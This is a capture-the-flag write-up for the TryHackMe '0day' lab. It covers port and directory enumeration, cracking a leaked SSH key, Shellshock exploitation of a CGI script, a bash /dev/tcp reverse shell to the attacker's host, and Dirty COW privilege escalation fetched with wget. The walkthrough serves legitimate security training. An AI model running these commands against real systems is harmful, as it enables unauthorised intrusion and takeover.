0day — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my 0day — TryHackMe — WriteUp. Check it out!
First, deploy the machine and nmap for opend ports:
nmap -A -p- -T4 -v <ip>
There are 2 ports opened: 22 (SSH) and 80 (HTTP). Let’s first access the website.
It’s a well designed website, huh! It’s always good to check the page source (Ctrl+U), but I’ve checked it and found nothing valuable. So, let’s now find some hidden dirs using gobuster.
gobuster dir -u <ip>:80 -w /path-to-wordlists
There are many hidden dirs here. As robots.txt is existed, let’s first access it.
Nothing really. Next, /secret
A turtle image? Looks like it’s time for some steganography. Download the image and look for hidden data. However, I’ve tried and found nothing, so you may skip it.
Next, /backup
It’s a private ssh RSA key! Let’s see if I can crack its password using john.
First, use ssh2john.py to change format of this key to the format that john can understand.
python ssh2john.py rsakey > key-to-crack.txt
Then, use john to crack this key:
john — wordlist=/path-to-wordlist key-to-crack.txt
After a while, I’ve got the password:
I’ve tried to login to ssh as ryan (which is the name I saw at the default website) and the private key. However, it didn’t work. So this private key is totally a rabbit hole 😣
Let’s look at the hint. It said that focus on the description, which is shellshock . It’s a Bash shell’s RCE vulnerability.
So, in order to exploit this vuln, I need to know the cgi script’s name. Let’s use gobuster again, but this time, start from dir /cgi-bin, and change the extension file to .cgi
gobuster dir -u <ip>:80/cgi-bin -x cgi -w /path-to-wordlist
Yes! I’ve found the test.cgi:
Now let’s exploit using shellshock vuln. I will use a tool called Shocker on Github. Here is the link to this Github repo.
First, start a listener on your machine:
nc -lvnp 4444
Then, use shocker to execute a reverse shell command:
python shocker.py -H <target-ip> -c /cgi-bin/test.cgi
It works! Now enter 1 to continue exploiting:
Now use a reverse shell command to get a shell to your machine. First, start a listener on your machine:
nc -lvnp 4444
Then, enter this command to shocker:
/bin/bash -c ‘/bin/bash -i >& /dev/tcp/<your-VPN-ip>/4444 0>&1’
Now I’ve got the shell! Move around and get the 1st flag inside ryan’s home folder.
Next, find a way to own root so I can read the final flag. I wil spawn a tty shell using python for stability and also sudo check:
python -c ‘import pty;pty.spawn(“/bin/bash”)’
export TERM=xterm
Let’s try sudo -l to see if I can run sudo:
Uh oh! I cannot run sudo on this machine. So let’s find another way. Look at the description, there’s kernel exploit. Check the kernel version: uname -r
Well it’s a really old kernel version! Look for exploit on Google and I found this link.
Download the code, compile:
gcc -pthread 40839.c -o cow -lcrypt
and then use python, wget to transfer the exploit code to the machine. First, start a HTTP server on the folder contains your exploit code:
python3 -m http.server 9000
Or if you use python2:
python2 -m SimpleHTTPServer 9000
Then, from the target machine, cd to /tmp and wget this exploit code from your machine:
wget <your-VPN-ip>:9000/cow
chmod +x cow to make it executable. Exec this code and you will be root!
Now get the final flag in /root folder.
The end.